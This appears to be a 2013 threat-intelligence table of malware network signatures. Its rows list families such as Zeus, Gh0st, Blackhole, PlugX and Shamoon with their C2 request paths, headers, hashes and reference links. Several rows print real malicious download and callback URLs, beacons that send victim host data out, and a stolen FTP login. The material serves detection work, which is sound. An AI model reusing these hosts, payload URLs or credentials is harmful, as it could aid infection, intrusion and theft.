http://bit.ly/crimepcaps | 6/1/2013 | ||||
105 | 2013-06-06 | CRIME | Mutopy Downloader | GET | /d/conh11.jpg | /conh11.jpg | /d/conh11.jpg User-Agent: - Host: gettrial.store-apps.org Cache-Control: no-cache | User-Agent: - | 80 | 20A6EBF61243B760DD65F897236B6AD3 | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 6/1/2013 | |||
106 | 2013-06-06 | CRIME | Mutopy Downloader initial callback | GET | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4 | /protocol.php?p= | /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4 User-Agent: - Host: www.wholists.org Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx Date: Mon, 27 May 2013 18:56:53 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 61 .."...+.......o...4...o...w...t...z...5...4...t...*...|...u...o...~...)...i...h...;...4...o...k.. | User-Agent: - | 80 | 20A6EBF61243B760DD65F897236B6AD3 | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 6/1/2013 | |||
107 | 2013-06-06 | CRIME | Symmi Remote File Injector | GET | <p>/img/seek.cgi?lin=100&db=dfs <p>/ae1.php <p>/ggu.php <p>/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies | /seek.cgi?lin= /ae1.php /ggu.php | /img/seek.cgi?lin=100&db=dfs Accept: */* User-Agent: Mozilla/5.0 Host: seek4.run-stat.org Connection: Keep-Alive Cache-Control: no-cache /ae1.php Accept: */* User-Agent: Mozilla/5.0 Host: bt.ads-runner.org Connection: Keep-Alive Cache-Control: no-cache /ggu.php Accept: */* User-Agent: Mozilla/5.0 Host: fw.point-up.org Connection: Keep-Alive Cache-Control: no-cache /wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies] Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 Host: [redacted victim wordpress cms] Content-Length: 484 Connection: Keep-Alive Cache-Control: no-cache lJtdmf=T2tpZzk5b2tpZ10xY29rZW1xQntjam1tLGFtbw==&evtrKd=CQRLEdhQu&miOLST=b3ZjNCxjbzIse2NqbW1mbHEsbGd2&dMXEq=PldRR1A8aXBrcXZjXW9jZmZtej4tV1FHUDwIPkxDT0c8IElwa3F2YyJPY2ZmbXogPi1MQ09HPAg%2B [snip] | User-Agent: Mozilla/5.0 | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | 7958f73daf4b84e3b00e008258ea2e7a | http://www.deependresearch.org/2013/05/under-this-rock-vulnerable.html | http://contagiodump.blogspot.com/2013/06/deepend-research-under-this-rock.html | http://bit.ly/crimepcaps | 6/1/2013 | |||
108 | 2013-06-06 | CRIME | Matsnu - MBR wiping ransomware | GET | /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP | /inbox.php?ltype=ld& | /0803&loc=0x0409&os=Windows%20XP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: nvufvwieg.com Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) | 1B2D2A4B97C7C2727D571BBF9376F54F | http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/ | 6/1/2013 | ||||||
109 | 2013-05-29 | CRIME | Adware Hotbar | POST | /vic.aspx?ver=4.0.1158.0&rnd=595937 | /vic.aspx?ver= | /vic.aspx?ver=4.0.1158.0&rnd=595937 Content-Type: application/x-www-form-urlencoded Filename: gUcmpCp User-Agent: NSIS_Inetc (Mozilla) Host: b.compqueue.com Content-Length: 276 Connection: Keep-Alive Cache-Control: no-cache epostdata=0c40ff4962816cc3e206edda1108327207ee080103baf1c6bb02c.... | NSIS_Inetc (Mozilla) | e8022373bc452ab06c49752ce20c5cc2 e7f41ba37a3c57dd31de45f0c1f855a1 d689f23246bd49b01bd30b5926e992ba | http://threatcenter.crdf.fr/?More&ID=145956&D=CRDF.AdWare.AdWare.Win32.HotBar553635795 | 2013-05 | ||||||
110 | 2013-05-29 | CRIME | Blackhole v2 | GET | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622 | /q.php?kf= | /7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a=1f&zg=c&tn=g&jopa=1658622 User-Agent: Java/1.7.0_10 Host: bandirmacatiemlak.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive | User-Agent: Java/1.7.0_10 | an attempt is made to exploit a known vulnerability in jdk. | 5/1/2013 | |||||||
111 | 2013-05-23 | CRIME | USteal.D | 220---------- Welcome to Pure-FTPd ---------- | 220---------- Welcome to Pure-FTPd ---------- 220-You are user number 1 of 100 allowed. 220-Local time is now 14:57. Server port: 21. 220-This is a private system - No anonymous login 220 You will be disconnected after 15 minutes of inactivity. USER 0jeck1072 331 User 0jeck1072 OK. Password required PASS q1w2e3r433590 230-User 0jeck1072 has group access to: 1002 | 21 | 2b796f11f15e8c73f8f69180cf74b39d | http://blogs.technet.com/b/mmpc/archive/2013/05/22/how-easily-usteal-my-passwords.aspx | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | ||||||
112 | 2013-05-23 | APT | Hangover Smackdown Minapro | GET | /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 | /snwd.php?tp= | Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C) Host: wreckmove.org Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C) | 02d6519b0330a34b72290845e7ed16ab bfd2529e09932ac6ca18c3aaff55bd79 | http://enterprise.norman.com/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf | 5/1/2013 | ||||||
113 | 2013-05-16 | CRIME | Cutwail / Pushdo | POST | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe | <p>/?ptrxcz_ <p>/?xclzve_ | /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe Accept: / Accept-Language: en-us Content-Type: application/octet-stream Content-Length: 193 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: uakron.edu Connection: Keep-Alive Cache-Control: no-cache g.P#...#...#...$..5$...$...$7S.$^.3%xQf%...%.O.%...&.Md&...&;L.&U..'o.H'...'...'...(..F(.. .2..(O..(. ........\+..p,.z...u)t.?>.-.p'+.<Z+.n.+.:.+...,.9X, ..,G7.,a. -{.<-...-...-......:...m.> | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | Also can use xclzve instead of ptrxcz | 582de032477e099eb1024d84c73e98c1 | https://www.damballa.com/downloads/r_pubs/Damballa_mv20_case_study.pdf | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | Unicode appid\{27af75ed-20d9-11d1-b1ce-00805fc1270e} | 5/1/2013 | ||
114 | 2013-05-15 | APT | Mediana Proxy | GET | /index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0 | /index.htm?n | Accept: / Accept-Language: en-us Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: firewall.happytohell.com:80 X-HOST: n763t4OPmrs6fXq7fXp7uj16e-r Content-Length: 0 Proxy-Connection: Keep-Alive | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | dropped by 0AE47E3261EA0A2DBCE471B28DFFE007 CVE-2010-3333 | ECA344925AA188E6A26BB4B2E09C783C | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | \system32\cmd.exe /c \command.com /c \msextlog.dll mslog \windns.dll InstalledSuccessful.ini No Startup item. level="asInvoker" level="requireAdministrator" \system32\dllcache\ dr.web HTTP/1.0 200 OK Date: Sun, 03 Aug 2003 13:41:30 GMT Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) Content-Length: %d | 10/1/2012 | |||
115 | 2013-05-15 | CRIME | Zeus | POST | <p>/orders2010.php <p>/busted.php | <p>/orders2010.php <p>/busted.php | Accept: / Content-Type: application/x-www-form-urlencoded Connection: Close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: mugspade.ru Content-Length: 76 Cache-Control: no-cache bn1=WIN7PRO_X86_000_74DEB1E36522DF69_26&sk1=C15CAF65F6280F4916AB79B669689A92 =========== Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: trapbath.ru Content-Length: 894 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | UPS DELIVERY CONFIRMATION ALERT APR2012.EXE | b1551c676a54e9127cd0e7ea283b92cc | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | |||||
116 | 2013-05-15 | CRIME | Gypthoy | POST | /opt/mainpage.php | /mainpage.php | Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: sonunigam.us Content-Length: 281 Connection: Keep-Alive Cache-Control: no-cache pcname=DELLXT¬e=PO&country=&user=gurutoolz0803&log=%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe%0D%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0D%0A%0D%0A | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | Arrives as attachment exe in zip. Drops decoy pdf (invoice) and VB binary Also checks ip /proxy/proxychecker/country.htm Host: www.samair.ru | 3ee49121300384ff3c82eb9a1f06f288 | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS%3AWin32%2FGypthoy.A#techdetails_link | <form method="POST" action=" http://www.samair.ru/proxy/proxychecker/country.htm Title body innerText \Mail1.htm v.exe putratS\smargorP\uneM tratS\swodniW\tfosorciM\gnimaoR\ataDppA show http://sonunigam.us/opt/mainpage.php http://www.sendsmsfree.co.uk/ht2.txt | 5/1/2013 | ||||
117 | 2013-05-14 | APT | Hupigon / Graybird | ........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.. | ........................................;...Windows XP 5.1 (2600.Service Pack 3)................................................................$...DELLXT.............................................................................................................................. 4s.love.......HACK.. | 8000 | 8F90057AB244BD8B612CD09F566EAC0C | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | DAREAMFORSS DOITANDILOVEU ILOVEU4EVER | 5/1/2013 | ||||||
118 | 2013-05-14 | APT | Variant Letsgo / TabMsgSQL downloader (comment crew) | GET | /index.htm | /index.htm | User-Agent: IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) Accept: / Host: mickeypluto.info Connection: Keep-Alive HTTP/1.1 200 OK Date: Tue, 19 Jul 2011 23:26:41 GMT Content-Length: 131 Content-Type: text/html Content-Location: http://mickeypluto.info/index.htm Last-Modified: Mon, 18 Jul 2011 08:22:34 GMT Accept-Ranges: bytes ETag: "ea835d82345cc1:15b981" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET <yahoo sb="CcNQ03px5eovHIwYjIdfgRzFURpvH8fqL8mv0JTF5EOoUJx8t62VCX@@(25043)"></yahoo> | IPHONE8.5(host:XPSP3-R93-Ofc2003SP2,ip:172.29.0.116) | <yahoo ex=" is/was also common | b21ba443726385c11802a8ad731771c0 | http://intelreport.mandiant.com/ | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | tusgoz IPHONE8.5(hz /USERPROFILE7fxsz v{.DLLWI %://mhkeblu to.H8/t )(sle| c 7|`0 <yapo sy "></ >/ex a; bound&y=--MULTk I-PARTS-FORM-DATA-BOUNDY DiW 0 | 7/20/2011 | ||
119 | 2013-05-14 | APT | Tapaoux | GET | /ol/yahoo/banner4.php?jpg=../yahoo | /banner4.php?jpg=../yahoo | /ol/yahoo/banner4.php?jpg=../yahoo User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) Host: re.policy-forums.org | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;) | 60AF79FB0BD2C9F33375035609C931CB | 8/23/2011 | |||||||
120 | 2013-05-13 | CRIME | Horst Proxy | GET | /socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0 | /proxy.php?ip= | /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 User-Agent: Mozilla/5.0 Host: ldark.com HTTP/1.1 302 Found Date: Tue, 14 May 2013 02:49:49 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze15 Location: http://ww41.ldark.com/socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 | Mozilla/5.0 | EFE5529D697174914938F4ABF115F762 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | |||||
121 | 2013-05-13 | CRIME | PassAlert | GET | /loader/bin/file1.exe | /bin/file1.exe | /loader/bin/file1.exe User-Agent: Mozilla/5.0 Host: porno-video-free.com | Mozilla/5.0 | B4A1368515C6C39ACEF63A4BC368EDB2 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | |||||
122 | 2013-05-12 | CRIME | Bitcoinminer | POST | / | / Authorization: Basic cXdlcnR5MTIzLjE6eA== Host: www2.x3x4.su:666 Accept-Encoding: deflate, gzip Content-Type: application/json Content-Length: 45 User-Agent: cpuminer 2.2.3 X-Mining-Extensions: midstate {"method": "getwork", "params": [], "id":0} HTTP/1.1 200 OK Server: nginx/1.2.1 Date: Sun, 12 May 2013 22:56:11 GMT Content-Type: application/json Content-Length: 635 Connection: keep-alive {"result": {"data": "000000017343cad1ae316260d1f2c262cc391443453a09fd8c8630e3bce86c47b3e476b73eaf9a0cf5eb36e74577ff3cb29f9267f5f300f252235ba77f47a9ea7aba6dba51901e351b6dcb6a00000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000", "hash1": "00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000", "midstate": "b1313289534677d23f93a6447a02047a09c369962cd1029393f5a2063368dcf2", "algorithm": "scrypt:1024,1,1", "target": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffff07000000"}, "id": 0, "error": null} | User-Agent: cpuminer 2.2.3 | 666 | 12E717293715939C5196E604591A97DF | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-05 | |||||
123 | 2013-05-12 | CRIME | Karagany Loader | GET | /user/go.php?html=do | /go.php?html=do | User-Agent: User-Agent: Opera/10.60 Presto/2.2.30 Host: mildpass.co.cc | User-Agent: Opera/10.60 Presto/2.2.30 | E6CBCEDD4D7150357312323B6F8EFA3F | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AWin32%2FKaragany.I#techdetails_link | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 5/1/2013 | ||||
124 | 2013-05-12 | APT | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 | 122B34A05530316E919604EF52EB9F1A | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html | 5/1/2013 | - | |||||||
125 | 2013-05-12 | APT | IXESHE | GET | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA | /AWS96.jsp? | /AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA x_bigfix_client_string: baQMyZrdqDAA User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: freedream.strangled.net:443 Connection: Keep-Alive | User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | 443 | 0F88D9B0D237B5FCDC0F985A548254F2 | spoolsv -=OK!=- Process Do not exit in 10 second, so i Kill it! | 5/1/2013 | |||||
126 | 2013-05-08 | APT2 | KoreanBanker DL | GET | /web/down/kbs.exe | /down/kbs.exe | Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.colorephone.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | E50A715D3A16CBD57339DD4C8D4605C8 8C1B83D95394BB52921DF6A218ECCA61 | http://labs.alienvault.com/labs/index.php/2013/a-theory-on-the-south-korean-attacks/ http://www.theregister.co.uk/2013/03/20/south_korea_cyberattack/ | http://bit.ly/aptsamples | http://www.colorephone.com/web/down/DeleteAll.exe \DeleteAll.exe http://www.colorephone.com/web/down/LoginMgr.dll \LoginMgr.dll http://www.colorephone.com/web/down/ftp.exe \ftp.exe http://www.colorephone.com/web/down/kbs.exe \kbs.exe | 3/1/2013 | ||||
127 | 2013-05-05 | APT | Plugx | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO46Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png | 443 | RTF 42fba80f105aa53dfbf50aeba2d73cae >> BIN 3C74A85C2CF883BD9D4B9F8B9746030F | http://www.circl.lu/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/ http://espionageware.blogspot.com/2013/05/tracing-apt163qq.html http://blog.trendmicro.com/trendlabs-security-intelligence/plugx-new-tool-for-a-not-so-new-campaign/ | http://bit.ly/aptsamples | shenzhen1503 (from DigCert) guangdong1 Unicode %s\Sidebar.dll.doc --does not apply to all plugx var guangdong1 Unicode %s\Sidebar.dll.doc | 5/1/2013 | ||||||
128 | 2013-05-05 | CRIME | PowerLoader | POST | /postnuke/blog.php | /blog.php | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: real-newslife.com Content-Length: 84 Cache-Control: no-cache .............y..W.. ,.1xV.....>.V>59..5K.xdH.h@<............./..._.4W.%.i.Oh.M....4. | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) | Powerloader bot for Gapz or Redyms | PowerLoaderv1 CE8B6E20E0EE177174FCA864C7451731 PowerLoaderv1 D4D96F60F6723B8EC5F1677D4657BE83 PowerLoaderv2 7DE3350CAFBE8FE843AEA9E8564E6AF5 4497A231DA9BD0EEA327DDEC4B31DA12 - May 2013 | http://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | srvurls tid=%d&ta=%s-%x fid=%d %s|%d| POST srvretry %[^.].%[^(](%[^)]) buildid os=%s&bid=%s srvdelay | 5/1/2013 | ||
129 | 2013-05-05 | APT | RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST | /orange/news.php | /news.php | Accept: / Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: killme.98.shoptupian.com Content-Length: 170 Connection: Keep-Alive Cache-Control: no-cache cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4841HTTP/1.1 200 OK Connection: close Date: Sun, 06 Jan 2013 05:47:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Content-type: text/css <div id="0a552b5a4352">{'command':[]}</div> | 68EE5FDA371E4AC48DAD7FCB2C94BAC7 | ~New /c %s %s /quiet /extract:%s wusa.exe Unicode: SkipIfPassed | 6/1/2012 | |||||||
130 | 2013-05-05 | APT | RssFeeder (moved from TBD tab, common name still unknown) initialGET | POST | /data/rss | /rss | /data/rss Accept: / User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5 Accept-Encoding: gzip, deflate Host: huming386.livejournal.com Connection: Keep-Alive HTTP/1.1 200 OK Server: GoatProxy 1.0 Date: Sun, 06 Jan 2013 05:49:06 GMT Content-Type: text/xml; charset=utf-8 Connection: keep-alive X-AWS-Id: ws30 Cache-Control: private, proxy-revalidate Content-Encoding: gzip Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ Vary: Accept-Encoding,ETag Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT Content-Length: 592 Accept-Ranges: bytes X-Varnish: 1502242906 1495326149 Age: 33018 X-VWS-Id: bil1-varn23 ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ X-Gateway: bil1-swlb07 X-Beta: http://varnish | 68EE5FDA371E4AC48DAD7FCB2C94BAC7 | ~New /c %s %s /quiet /extract:%s wusa.exe Unicode: SkipIfPassed | 6/1/2012 | |||||||
131 | 2013-05-05 | APT | Swami | GET | /im/linux.php | /linux.php | Host: www.maintechy.com Content-Length: 2281 Cache-Control: no-cache | 972c692625bd57f0c7264c9e048752f6 33A5B48073AE9A11EC2F26318D0C4721 | http://byt0r.blogspot.com/2012/06/quick-notes-wpct-action-plan-from.html | http://bit.ly/aptpcaps | 5/1/2013 | ||||||
132 | 2013-05-02 | CRIME | GameThief | GET | /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 | /get.asp?mac= | User-Agent: Google page Host: 198.105.210.180 Cache-Control: no-cache | Google page | ECBA0FEB36F9EF975EE96D1694C8164C 4e4ea8acc683bdd054e032f8a2895c74 | http://www.threatexpert.com/report.aspx?md5=ecba0feb36f9ef975ee96d1694c8164c | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | ||||
133 | 2013-05-02 | CRIME | Beebone downloader | GET | <p>/0/?f|-1813912965Admin <p>/a/76876332/1 | {random}.{domain}:{port}/{number}/{affiliate_id}|{hdserial}{username} /0/?f|-1813912965Admin /1/?b|-2020396961winxp /2/?f|-1396129654Guest /9/?a|-1312965453MyPC /0/?f|-2713912961Developer /0/?b|-5711296542Windows7 /1/?a|-1296545361Administrator /0/?f|-1813912965Admin a/76876332/1 /a/76876332/bb1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1) | Random 41001 30980 8080 443 | http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fBeebone#techdetails_link | 2013-05 | |||||||
134 | 2013-05-02 | CRIME | Neutrino EK var | POST | /cxiqocvbqd | x-requested-with: XMLHttpRequest Accept-Language: en-us Referer: http://thejegos. info/lkijppm?fqogndmmqm=7737359 Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR ‘2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0. 30729) Host: thejegos. info Content-Length: 769 Connection: Keep-Al ive Cache-Control: no-cache pcnfjrcxxpu=gbdl nep&ivexxbpclutvfxs=%251C%2540%250C%2505%2SOAGJEwU%2558XR1%2502%2500%2505%250E%250Fw %2513%2504Z%255D%255D%250AU%2540%255E%2506%2501%2509L1R%2517%250E%2511%250B%2507%250B%2503EX%2S1FN% 250F%2501%251F%2505%2507%2538%251E%250B%2504%2514%2502%251OFVLT%2S4OKRH%2SSCBURK%2540%250E%250D% 2518%2504R%255D%250C%2511%2500%25021R%2501%250E%2505%251F%2506GJ%2509%2517%2508%2SOOBG%2501%2512% 2508%2507%25071%2511%2519%250A%2507FV%2500%2510%251C%2SOBNF%251E%2508%2504%251C8%2512%2508%250D% 2508%2SOEHN%251D%250C%251C%2511%2507%25163%2502%250C%2517%250F%2516FV%2500%2510%251C%2SOBNF%251A% 2502%2506R%255D%250C%2511%2500%25021R%2510%250F%2514NT%250B%2505%250B%250E%2519%2S11 | Mozilla/4.0 (compatible; MSIE 8.0; windows NT 6.1; Trident/4.0; SLCC2; .NET CLR ‘2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0. 30729) | http://malforsec.blogspot.no/2013/02/zeroaccess-analysis-part-i-network.html | 4/1/2013 | ||||||||
135 | 2013-05-01 | APT | Comfoo / Vinself / Mspub | POST | /BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/ | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, / Accept-Language: en-en User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) Host: mail.lthreebox.com Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1) | 69bb7612b2e6a0f647b3e9c93b0bf572 DA52D94C1F5D46F5C1F73D60DA04C53C | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf | http://bit.ly/aptsamples | 5. Disk Information! 4. Account Information! 3. System Time! 2. CPU Type! Unicode RDOMAIN RNAME | 4/7/2011 | |||||
136 | 2013-05-01 | APT | Destory Rat / Sogu / Thoper | POST | /update?id=000f72b8 | /update?id= | Accept: / X-Session: 0..X- Status: 0 X-Siz e: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1) Host : localhost Content-Length: 0 Connection: Keep -Alive Cache-Control: no-cache. | Mozilla/4.0 (compatible; MSIE 6.0 ; Windows NT 5.1 ; .NET CLR 2.0.5 0727; SV1) | 2385B332637DD37E4E5C79A1FED46171 | http://www.threatexpert.com/report.aspx?md5=2385b332637dd37e4e5c79a1fed46171 | http://bit.ly/aptsamples | GETPASSWORD1 RarSFX Svchost.exePK Presetup=c:\windows\ Silent=1 Unicode Shell.Explorer about:blank ASKNEXTVOL | 4/18/2013 | ||||
137 | 2013-05-01 | APT2 | Disttrack / Shamoon | GET | /ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203 | /data.asp?mydata= | /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 User-Agent: you | you | D214C717A357FE3A455610B197C390AA B14299FD4D1CBFB4CC7486D978398214 | http://vrt-blog.snort.org/2012/08/new-threat-disttrack.html | http://bit.ly/aptsamples | 8/1/2012 | |||||
